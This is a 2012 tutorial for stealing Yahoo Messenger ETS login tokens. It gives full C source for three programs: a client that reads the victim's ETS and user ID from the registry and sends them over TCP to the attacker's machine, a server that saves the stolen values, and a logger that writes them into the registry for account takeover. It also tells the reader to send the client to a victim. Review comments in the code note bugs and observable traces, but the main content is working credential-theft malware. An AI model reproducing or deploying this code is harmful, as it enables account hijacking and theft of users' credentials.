joi, 23 februarie 2012

Yahoo ETS Stealer

This is a tutorial on how to steal a Yahoo ETS.


For those of you who don't know, an ETS is a string coded in the Yahoo64 algorithm that can be used to log in to Yahoo! Messenger, and from there to Yahoo! Mail.

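It is located in the Windows registry, under HKEY_CURRENT_USER -> Software -> Yahoo -> pager. Because this is a per-user key, any program running under that user's account can read it, so the stored value has to be treated like a saved password.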

If you have a user's ETS and ID, you can log in to their account by doing the following:
1)Open Yahoo! Messenger and check the "Remember Id & password" box
2)Open regedit (start -> run -> regedit)
3)Navigate to HKEY_CURRENT_USER -> Software -> Yahoo -> pager
4)Modify the values of ETS and Yahoo! User ID to the values that you have stolen
5)Set the Auto Login value to 1
6)If you have Yahoo Messenger open, close it
7)Open Yahoo Messenger


If you have done everything right, it should log you in as the user that you typed under the Yahoo! User ID value.

Next, I will give you the source code of 3 programs that can be used to steal a Yahoo ETS:
server - is used to receive the ETS and user id from the client and save it as a .txt file
client - 'steals' the victim's ETS and user id
logger - is used to log you in to the stolen accounts

The programs are written in C. I used Visual Studio 2010 to compile them.
You should place the server and the logger in the same folder in your computer.
After that, open the server, send the client to a victim and wait until you receive the password (usually just a few seconds after he opens it). A new .txt file will appear in the folder where you have the server app. Next, open the logger and log in to the victim's account.

NOTE: you should replace 127.0.0.1 with your ip in the client app before compiling it and sending it to the victim. 


SERVER:
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdio.h>
#define DEFAULT_PORT "27015"
#define DEFAULT_BUFLEN 512
#pragma comment(lib, "ws2_32.lib")


/*
 * Receiver side of the tool described on this page.
 *
 * Listens on TCP port DEFAULT_PORT ("27015") on the local IPv4 wildcard
 * address, accepts one connection at a time, reads a single message of the
 * form "<name>$<payload>" and writes <payload> to a file named "<name>.txt"
 * in the current working directory.
 *
 * What an analyst can observe: a listening socket on 27015/tcp and one
 * cleartext, unauthenticated message per inbound connection.
 *
 * NOTE(review): everything after recv() treats bytes from the network as
 * trusted input; the inline notes mark the resulting out-of-bounds accesses.
 * NOTE(review): `true` and the declarations in the middle of blocks are not
 * C89; presumably this was built as C++ in Visual Studio 2010 - confirm.
 */
int main() {
 FILE* fisier;
 WSADATA wsaData;
 int iResult;
 /* Request Winsock 2.2. Note that this failure path returns 0, unlike the
    later ones which return 1. */
 iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
 if (iResult != 0) {
  printf("Eroare. %d", iResult);
  return 0;
 }
 /* ptr is declared but never used in this program. */
 struct addrinfo *result = NULL,
     *ptr = NULL,
     hints;

 /* IPv4 + TCP; AI_PASSIVE with a NULL node name asks for an address
    suitable for bind() on any local interface. */
 ZeroMemory( &hints, sizeof(hints) );
 hints.ai_family = AF_INET;
 hints.ai_socktype = SOCK_STREAM;
 hints.ai_protocol = IPPROTO_TCP;
 hints.ai_flags = AI_PASSIVE;

 // Resolve the local address and port to be used by the server
 iResult = getaddrinfo(NULL, DEFAULT_PORT, &hints, &result);
 if ( iResult != 0 ) {
  printf("getaddrinfo failed: %d\n", iResult);
  WSACleanup();
  return 1;
 }
 SOCKET ListenSocket = INVALID_SOCKET;
 ListenSocket = socket(result->ai_family, result->ai_socktype, result->ai_protocol);
 if (ListenSocket == INVALID_SOCKET) {
  printf("Error at socket(): %ld\n", WSAGetLastError());
  freeaddrinfo(result);
  WSACleanup();
  return 1;
 }
 
 // Setup the TCP listening socket
 iResult = bind( ListenSocket, 
  result->ai_addr, (int)result->ai_addrlen);
 if (iResult == SOCKET_ERROR) {
  printf("bind failed: %d\n", WSAGetLastError());
  freeaddrinfo(result);
  closesocket(ListenSocket);
  WSACleanup();
  return 1;
 }
 /* NOTE(review): result is only freed on the error paths above; after a
    successful bind() it is never passed to freeaddrinfo(). The message
    below also says bind() although the failing call is listen(). */
 if ( listen( ListenSocket, SOMAXCONN ) == SOCKET_ERROR ) {
    printf( "Error at bind(): %ld\n", WSAGetLastError() );
    closesocket(ListenSocket);
    WSACleanup();
    return 1;
 }
 SOCKET ClientSocket;

 ClientSocket = INVALID_SOCKET;

 // Accept clients one after another; contorParole counts received messages
 int contorParole = 1;
 while (true) {
  /* Peer address is not requested (NULL, NULL), so the sender is neither
     recorded nor checked. */
  ClientSocket = accept(ListenSocket, NULL, NULL);
  if (ClientSocket == INVALID_SOCKET) {
   printf("accept failed: %d\n", WSAGetLastError());
   closesocket(ListenSocket);
   WSACleanup();
   return 1;
  }
  char recvbuf[DEFAULT_BUFLEN];
  int recvbuflen = DEFAULT_BUFLEN;
  /* A single recv() call: the whole message is assumed to arrive in one
     read of at most DEFAULT_BUFLEN bytes. */
  iResult = recv(ClientSocket, recvbuf, recvbuflen, 0);
  if (iResult > 0) {
   printf("Password nr. %d received.\n", contorParole);
  }
  /* NOTE(review): a zero-length read only prints a message; execution
     still falls through to the parsing code below with no data. */
  else if (iResult == 0)
   printf("Connection closing...\n");
  else  {
   printf("recv failed: %d\n", WSAGetLastError());
   closesocket(ClientSocket);
   WSACleanup();
   return 1;
  }
  /* NOTE(review): when recv() fills the buffer (iResult == DEFAULT_BUFLEN)
     this writes one byte past the end of recvbuf. */
  recvbuf[iResult] = '\0';
  char numeFisier[128];
  int aux = 0;
  /* Copy everything before the '$' separator into the file name.
     NOTE(review): the loop stops only on '$'. It does not check for the
     terminating NUL or for the 128-byte size of numeFisier, so a message
     without '$' or with a long prefix reads and writes out of bounds. */
  while (recvbuf[aux] != '$') {
   numeFisier[aux] = recvbuf[aux];
   aux++;
  }
  numeFisier[aux] = '\0';
  /* strcat already terminates the string; the explicit store on the next
     line is redundant. ".txt" is appended without a remaining-space check. */
  strcat(numeFisier, ".txt");
  numeFisier[aux+4] = '\0';
  /* NOTE(review): the file name comes verbatim from the peer and is not
     validated; the fopen() result is not checked before use. */
  fisier = fopen(numeFisier, "w");
  /* Everything after the separator is stored as the file's content. */
  fprintf(fisier, "%s", &recvbuf[aux+1]);
  fclose(fisier);
  /* NOTE(review): ClientSocket is not closed on this path, so each handled
     connection leaves a socket open. */
  contorParole++;
 }
 /* Unreachable: the loop above has no break. */
 system("pause");
 return 0;
}
CLIENT:
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdlib.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")

#define DEFAULT_BUFLEN 512
#define DEFAULT_PORT "27015"

/* Scratch record for one value returned by RegEnumValue: name, type, data. */
typedef struct regentry{
 char nume[256];   /* value name; main() passes a capacity of 255 characters */
 DWORD tip;        /* registry type code of the value */
 byte data[256];   /* raw value data; NOTE(review): main() passes lenData = 511 for this 256-byte buffer */
} regentry;

/*
 * Sender side of the tool described on this page.
 *
 * Enumerates the values under HKEY_CURRENT_USER\Software\Yahoo\Pager, picks
 * the ones named "ETS" and "Yahoo! User ID", joins them as
 * "<first match>$<second match>" and sends that string in a single
 * cleartext TCP message to the hard-coded address in `ip`, port
 * DEFAULT_PORT ("27015").
 *
 * What a defender can observe, all taken from the code below: a process
 * opening that registry key with KEY_QUERY_VALUE and enumerating its
 * values, followed by an outbound TCP connection to port 27015 carrying
 * the two values unencrypted, separated by '$'.
 *
 * argc and argv are not used.
 */
int __cdecl main(int argc, char **argv) 
{
 int contor = 0;          /* number of matching values copied so far */
 char sendbufmeu[512];    /* outgoing message; NOTE(review): left uninitialised if no value matches */
 regentry valori; 
 int i = 0;               /* index of the registry value being enumerated */
 /* NOTE(review): lenData is 511 but valori.data is declared with 256
    bytes, so RegEnumValue is told the buffer is larger than it is. */
 DWORD lenNumeValoare = 255, lenData = 511;
 char subkey[] = "Software\\Yahoo\\Pager";
 HKEY cheie; 
 /* RegCreateKeyEx opens the key, and creates it if it does not exist yet.
    Only query access is requested. The handle is never closed with
    RegCloseKey later in this function. */
 if(RegCreateKeyEx(HKEY_CURRENT_USER, subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_QUERY_VALUE, NULL, &cheie, NULL)!=ERROR_SUCCESS){
  printf("Eroare la deschidere cheie!");
  return 1;
 }
 /* Read value #0. A failure is only reported; the loop below still runs
    and inspects valori, which is then uninitialised. */
 if(RegEnumValue(cheie, i, valori.nume, &lenNumeValoare, NULL, &valori.tip, valori.data, &lenData)!=ERROR_SUCCESS){
  printf("Eroare. %d", GetLastError());
 }
 do{
  i++;
  if(!strcmp(valori.nume, "ETS") || !strcmp(valori.nume, "Yahoo! User ID")) {
   /* The first match becomes the part before '$', the second the part
      after it. Which value ends up where depends on enumeration order;
      presumably "Yahoo! User ID" is expected first, since the receiver
      uses the prefix as a file name - confirm. */
   if(contor==0){
    strcpy(sendbufmeu, (char*)valori.data);
    strcat(sendbufmeu, "$");
    contor++;
   }
   else
    strcat(sendbufmeu, (char*)valori.data);
  }
  /* RegEnumValue overwrites both lengths, so reset them for each call. */
  lenNumeValoare = 255; lenData = 511;
  /* NOTE(review): the loop ends only on ERROR_NO_MORE_ITEMS; any other
     return code, including an error, runs the body again on the data
     already in valori. */
 }while(RegEnumValue(cheie, i, valori.nume, &lenNumeValoare, NULL, &valori.tip, valori.data, &lenData) != ERROR_NO_MORE_ITEMS);

    /* From here on: a plain Winsock TCP client. sendbuf, recvbuf and
       recvbuflen are declared but not used in this function. */
    WSADATA wsaData;
    SOCKET ConnectSocket = INVALID_SOCKET;
    struct addrinfo *result = NULL,
                    *ptr = NULL,
                    hints;
    char *sendbuf = "this is a test";
    char recvbuf[DEFAULT_BUFLEN];
    int iResult;
    int recvbuflen = DEFAULT_BUFLEN;
    
 /* Hard-coded destination; the page tells the builder to change it. */
 char ip[] = "127.0.0.1";

    // Initialize Winsock
    iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
    if (iResult != 0) {
        printf("WSAStartup failed: %d\n", iResult);
        return 1;
    }

    ZeroMemory( &hints, sizeof(hints) );
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_protocol = IPPROTO_TCP;

    // Resolve the server address and port
    iResult = getaddrinfo(ip, DEFAULT_PORT, &hints, &result);
    if ( iResult != 0 ) {
        printf("getaddrinfo failed: %d\n", iResult);
        WSACleanup();
        return 1;
    }

    // Attempt to connect to an address until one succeeds
    for(ptr=result; ptr != NULL ;ptr=ptr->ai_next) {

        // Create a SOCKET for connecting to server
        ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype, 
            ptr->ai_protocol);
        if (ConnectSocket == INVALID_SOCKET) {
            printf("Error at socket(): %ld\n", WSAGetLastError());
            freeaddrinfo(result);
            WSACleanup();
            return 1;
        }

        // Connect to server.
        iResult = connect( ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);
        if (iResult == SOCKET_ERROR) {
            closesocket(ConnectSocket);
            ConnectSocket = INVALID_SOCKET;
            continue;
        }
        break;
    }

    freeaddrinfo(result);

    if (ConnectSocket == INVALID_SOCKET) {
        printf("Unable to connect to server!\n");
        WSACleanup();
        return 1;
    }

    // Send the collected registry values as one unencrypted message
    iResult = send( ConnectSocket, sendbufmeu, (int)strlen(sendbufmeu), 0 );
    if (iResult == SOCKET_ERROR) {
        printf("send failed: %d\n", WSAGetLastError());
        closesocket(ConnectSocket);
        WSACleanup();
        return 1;
    }
    // shutdown the connection since no more data will be sent
    iResult = shutdown(ConnectSocket, SD_SEND);
    if (iResult == SOCKET_ERROR) {
        printf("shutdown failed: %d\n", WSAGetLastError());
        closesocket(ConnectSocket);
        WSACleanup();
        return 1;
    }

    // cleanup
    closesocket(ConnectSocket);
    WSACleanup();
    return 0;
}
LOGGER:
#include "stdafx.h"
#include <Windows.h>

#define LEN 512

/* One capture file found by the directory scan in _tmain. */
typedef struct users{
 char numeFisier[256];   /* file name as returned by the scan, extension included */
 char numeFaraExt[256];  /* same name with its last four characters cut off */
 //add here
 } users;

/*
 * Replay side of the tool described on this page.
 *
 * Lists the *.txt files in the current directory, lets the operator pick
 * one by number, then writes three values under
 * HKEY_CURRENT_USER\Software\Yahoo\pager: "ETS" (the file's content),
 * "Yahoo! User ID" (the file name without its extension) and
 * "Auto Login" (DWORD 1).
 *
 * Security-relevant point: per the page, a token copied from one machine is
 * accepted when replayed from another, i.e. the stored value is not tied to
 * the device it was issued on.
 *
 * NOTE(review): narrow char buffers are passed to the TCHAR-based Win32
 * calls, so this presumably builds only with a multi-byte character set -
 * confirm. No return value after FindFirstFile is checked, and none of the
 * handles (find handle, file handle, registry key) is closed.
 */
int _tmain(int argc, _TCHAR* argv[])
{
 HANDLE firstFile;
 int i = 0;                 /* number of files collected so far */
 users fisiere[1024];
 char currentPath[LEN];
 /* Build the search pattern "<current directory>\*.txt". */
 GetCurrentDirectory(LEN, currentPath);
 strcat(currentPath, "\\*.txt");
 WIN32_FIND_DATA winFD;
 if((firstFile = FindFirstFile(currentPath, &winFD)) == INVALID_HANDLE_VALUE) {
  printf("error %d.", GetLastError());
  return 0;
 }
 int x;
 do {
  /* NOTE(review): no check that i stays below 1024, and cFileName is
     copied into 256-byte fields without a length check. */
  strcpy(fisiere[i].numeFisier, winFD.cFileName);
  strcpy(fisiere[i++].numeFaraExt, winFD.cFileName);
  /* Empty-bodied loop: x ends up as the length of the file name. */
  for (x = 0; fisiere[i-1].numeFisier[x] != '\0'; x++);
  /* Drop the last four characters (the ".txt" suffix). */
  fisiere[i-1].numeFaraExt[x-4] = '\0';
  x = 0;
 }while(FindNextFile(firstFile, &winFD) != 0);
 int j = 0;
 /* Print a 1-based menu of the collected names.
    NOTE(review): j is read (j+1) and modified (j++) in the same argument
    list with no sequencing between them, which is undefined behaviour. */
 while(j < i) 
  printf("%-4d%s\n",j+1, fisiere[j++].numeFaraExt);
 printf("\nTastati indicele userului pe care vreti sa va logati apoi apasati Enter: \n");
 int user;
 printf("->");
 /* NOTE(review): neither scanf's result nor the range of `user` is
    checked before it is used as an array index below. */
 scanf("%d", &user);
 HANDLE toHack;
 /* OPEN_ALWAYS creates the file if it does not exist. */
 toHack = CreateFile(fisiere[user-1].numeFisier, FILE_READ_DATA, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
 byte continut[LEN];
 DWORD biticititi;          /* number of bytes actually read */
 ReadFile(toHack, continut, LEN, &biticititi, NULL);
 HKEY cheieReg;
 /* Four-byte buffer 01 00 00 00, written below as a REG_DWORD. */
 byte autoLog[4];
 for(i = 0; i < 4; i++)
  autoLog[i] = 0;
 autoLog[0] = 1;
 DWORD al = 1;              /* not used */
 RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Yahoo\\pager", 0,  KEY_SET_VALUE, &cheieReg);
 /* Both string writes pass a byte count without a terminating NUL: the
    number of bytes read from the file, and strlen() of the name. */
 RegSetKeyValue(cheieReg, NULL, "ETS", REG_SZ, continut, biticititi);
 RegSetKeyValue(cheieReg, NULL, "Yahoo! User ID", REG_SZ, fisiere[user-1].numeFaraExt, strlen(fisiere[user-1].numeFaraExt));
 RegSetKeyValue(cheieReg, NULL, "Auto Login", REG_DWORD, autoLog, 4);
 printf("\nInchideti mess-ul in cazut in care este pornit, apoi deschideti o fereastra de mess noua...\n");
 return 0;
}

Important note:
Stealing a Yahoo ETS is illegal.
You should only use these programs with people who have given you explicit permission to do so, and under no circumstances use them as hacking tools.